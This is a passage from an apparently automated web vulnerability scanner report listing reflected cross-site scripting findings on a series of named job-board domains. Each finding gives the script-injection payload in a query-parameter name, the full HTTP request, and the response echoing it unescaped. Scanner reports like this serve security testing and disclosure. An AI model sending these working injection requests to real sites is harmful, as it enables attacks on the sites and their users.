Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:40 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104377

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.publicinterestcrossing.com/?446c3"><script>alert(1)</script>0be37d14be6=1">
...[SNIP]...

3.103. http://www.publishingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.publishingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1299"><script>alert(1)</script>63d6d679443 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d1299"><script>alert(1)</script>63d6d679443=1 HTTP/1.1
Host: www.publishingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:28 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=aiscpmnekeoaiek7jnvn73dp42; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114371

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.publishingcrossing.com/?d1299"><script>alert(1)</script>63d6d679443=1">
...[SNIP]...

3.104. http://www.purchasingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.purchasingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d28bb"><script>alert(1)</script>b81fd1e5072 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d28bb"><script>alert(1)</script>b81fd1e5072=1 HTTP/1.1
Host: www.purchasingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gmq6hirbm9eue9jjuuskphbjn7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:17 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105527

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.purchasingcrossing.com/?d28bb"><script>alert(1)</script>b81fd1e5072=1">
...[SNIP]...

3.105. http://www.qaqccrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.qaqccrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29083"><script>alert(1)</script>3b93251e4b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?29083"><script>alert(1)</script>3b93251e4b2=1 HTTP/1.1
Host: www.qaqccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:26:02 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vsmun0sght8cf4achncb8ubfe5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:26:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120308

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.qaqccrossing.com/?29083"><script>alert(1)</script>3b93251e4b2=1">
...[SNIP]...

3.106. http://www.radiocrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.radiocrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6983f"><script>alert(1)</script>7619a9d5f08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6983f"><script>alert(1)</script>7619a9d5f08=1 HTTP/1.1
Host: www.radiocrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:21 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a94a3oatt4kmsoc6ijm0m7a5n1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113039

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.radiocrossing.com/?6983f"><script>alert(1)</script>7619a9d5f08=1">
...[SNIP]...

3.107. http://www.realestateandlandcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateandlandcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef9e9"><script>alert(1)</script>126cfe4dd1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ef9e9"><script>alert(1)</script>126cfe4dd1e=1 HTTP/1.1
Host: www.realestateandlandcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:06 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bsc5erjjrsq5ueq9uqc5ru32g7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133027

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.realestateandlandcrossing.com/?ef9e9"><script>alert(1)</script>126cfe4dd1e=1">
...[SNIP]...

3.108. http://www.recruitingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.recruitingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16149"><script>alert(1)</script>16bf2ef67b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?16149"><script>alert(1)</script>16bf2ef67b6=1 HTTP/1.1
Host: www.recruitingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:32 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=492145tgm4g6mf4vc155mn93e3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:32 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105635

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.recruitingcrossing.com/?16149"><script>alert(1)</script>16bf2ef67b6=1">
...[SNIP]...

3.109. http://www.researchingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.researchingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5ee5"><script>alert(1)</script>4bed916ba21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c5ee5"><script>alert(1)</script>4bed916ba21=1 HTTP/1.1
Host: www.researchingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=divi8ktvms9d45k1rajt78o7o3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113020

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.researchingcrossing.com/?c5ee5"><script>alert(1)</script>4bed916ba21=1">
...[SNIP]...

3.110. http://www.retailcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.retailcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93fb6"><script>alert(1)</script>28a079ac530 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?93fb6"><script>alert(1)</script>28a079ac530=1 HTTP/1.1
Host: www.retailcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ste5haotf5vmef1qsurie2n7n5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:55 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105739

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.retailcrossing.com/?93fb6"><script>alert(1)</script>28a079ac530=1">
...[SNIP]...

3.111. http://www.sciencescrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sciencescrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0897"><script>alert(1)</script>765803bdfda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f0897"><script>alert(1)</script>765803bdfda=1 HTTP/1.1
Host: www.sciencescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=8sa88hljrj6q4ofs3se5guljd6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 139746

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.sciencescrossing.com/?f0897"><script>alert(1)</script>765803bdfda=1">
...[SNIP]...

3.112. http://www.scientistcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.scientistcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28639"><script>alert(1)</script>c7ffa7b203b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?28639"><script>alert(1)</script>c7ffa7b203b=1 HTTP/1.1
Host: www.scientistcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:51 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=iurdrjelo6pic6sm8jh3gs4hm7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 107101

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.scientistcrossing.com/?28639"><script>alert(1)</script>c7ffa7b203b=1">
...[SNIP]...

3.113. http://www.sellingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sellingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 117a5"><script>alert(1)</script>7d8b1b4448d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?117a5"><script>alert(1)</script>7d8b1b4448d=1 HTTP/1.1
Host: www.sellingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:34 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=dhcgj2evje60sqquu78rls5h52; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.sellingcrossing.com/?117a5"><script>alert(1)</script>7d8b1b4448d=1">
...[SNIP]...

3.114. http://www.sqlcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sqlcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ef3"><script>alert(1)</script>f655a652a29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?66ef3"><script>alert(1)</script>f655a652a29=1 HTTP/1.1
Host: www.sqlcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:20 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=imr0t828o1o340ptffl1rftdv1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109142

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.sqlcrossing.com/?66ef3"><script>alert(1)</script>f655a652a29=1">
...[SNIP]...

3.115. http://www.teenagercrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.teenagercrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8279"><script>alert(1)</script>68ad5a2e707 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d8279"><script>alert(1)</script>68ad5a2e707=1 HTTP/1.1
Host: www.teenagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:01 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
